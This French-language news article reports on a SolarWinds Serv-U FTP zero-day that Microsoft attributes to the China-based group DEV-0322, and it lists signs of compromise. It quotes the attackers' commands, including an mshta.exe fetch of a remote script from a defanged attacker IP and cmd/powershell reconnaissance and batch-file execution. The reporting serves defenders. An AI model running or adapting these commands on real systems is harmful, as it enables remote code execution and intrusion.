SolarWinds: des pirates utilisent la nouvelle faille zero-day dans des attaques

0

Des pirates informatiques basés en Chine ciblent désormais les organisations en utilisant une vulnérabilité dans les serveurs FTP Serv-U de SolarWinds.

SolarWinds a publié une mise à jour de sécurité pour une vulnérabilité zero-day dans les serveurs FTP Serv-U qui permettent l’exécution de code à distance lorsque SSH est activé.

Selon SolarWinds, cette vulnérabilité a été divulguée par Microsoft, qui a vu un individu malveillant l’exploiter activement pour exécuter des commandes sur les appareils vulnérables des clients.

Microsoft a révélé que les attaques sont attribuées avec une grande confiance à un groupe de menaces basé en Chine et identifié comme « DEV-0322 ».

« Ce groupe est basé en Chine et a été observé utilisant des solutions VPN commerciales et des routeurs grand public compromis dans leur infrastructure d’attaquant », indique un nouveau billet de blog du Microsoft Threat Intelligence Center.

solarwinds

Microsoft affirme que le groupe de piratage DEV-0322 a déjà ciblé des entités américaines et des sociétés de logiciels.

« Le secteur DIB est le complexe industriel mondial qui permet la recherche et le développement (R&D), ainsi que la conception, la production, la livraison et la maintenance de systèmes d’armes militaires, de sous-systèmes et de composants ou pièces, pour répondre aux exigences militaires américaines », explique un document CISA décrivant le secteur DIB.

Attaques détectées par la télémétrie Microsoft 365 Defender

Microsoft dit avoir appris les attaques pour la première fois après que la télémétrie de Microsoft 365 Defender a montré un processus de Serv-U normalement inoffensif engendrant des processus malveillants anormaux.

Certaines des commandes exécutées via la vulnérabilité d’exécution de code à distance sont répertoriées ci-dessous.

C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)

cmd.exe /c whoami > “./Client/Common/redacted.txt”

cmd.exe /c dir > “.\Client\Common\redacted.txt”

cmd.exe /c “”C:\Windows\Temp\Serv-U.bat””

powershell.exe C:\Windows\Temp\Serv-U.bat

cmd.exe /c type \\redacted\redacted.Archive > “C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive”

« Nous avons observé que DEV-0322 redirigeait la sortie de ses commandes cmd.exe vers des fichiers du dossier Serv-U\Client\Common\, accessible par défaut depuis Internet, afin que les attaquants puissent récupérer les résultats des commandes,  » explique Microsoft dans son article de blog.

D’autres commandes ajouteraient un utilisateur-administrateur global à la configuration du serveur FTP Serv-U ou lanceraient des fichiers de commandes et des scripts pour installer probablement des logiciels malveillants sur les appareils pour la persistance et l’accès à distance.

Microsoft indique que les utilisateurs de Serv-U peuvent vérifier si leurs appareils ont été compromis en vérifiant le fichier log Serv-U DebugSocketLog.txt et en recherchant les messages d’exception.

Une exception « C0000005; CSUSSHSocket::ProcessReceive » pourrait indiquer que les pirates informatiques ont tenté d’exploiter le serveur Serv-U, mais l’exception pourrait également être affichée pour d’autres raisons.

Un exemple d’exception vu dans les journaux est affiché ci-dessous.

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive(); Type: 30; puchPayLoad = 0x03e909f6; nPacketLength = 76; nBytesReceived = 80; nBytesUncompressed = 156; uchPaddingLength = 5

D’autres signes qu’un appareil peut avoir été compromis sont:

  • Fichiers .txt récemment créés dans le dossier Client\Common.
  • Serv-U a généré des processus pour mshta.exe, powershell.exe, cmd.exe et des processus exécutés à partir de C:\Windows\temp.
  • Utilisateurs globaux non reconnus dans la configuration de Serv-U.

Si cet article vous a plu, n’oubliez pas de jeter un œil à nos bons plans.

Laisser un commentaire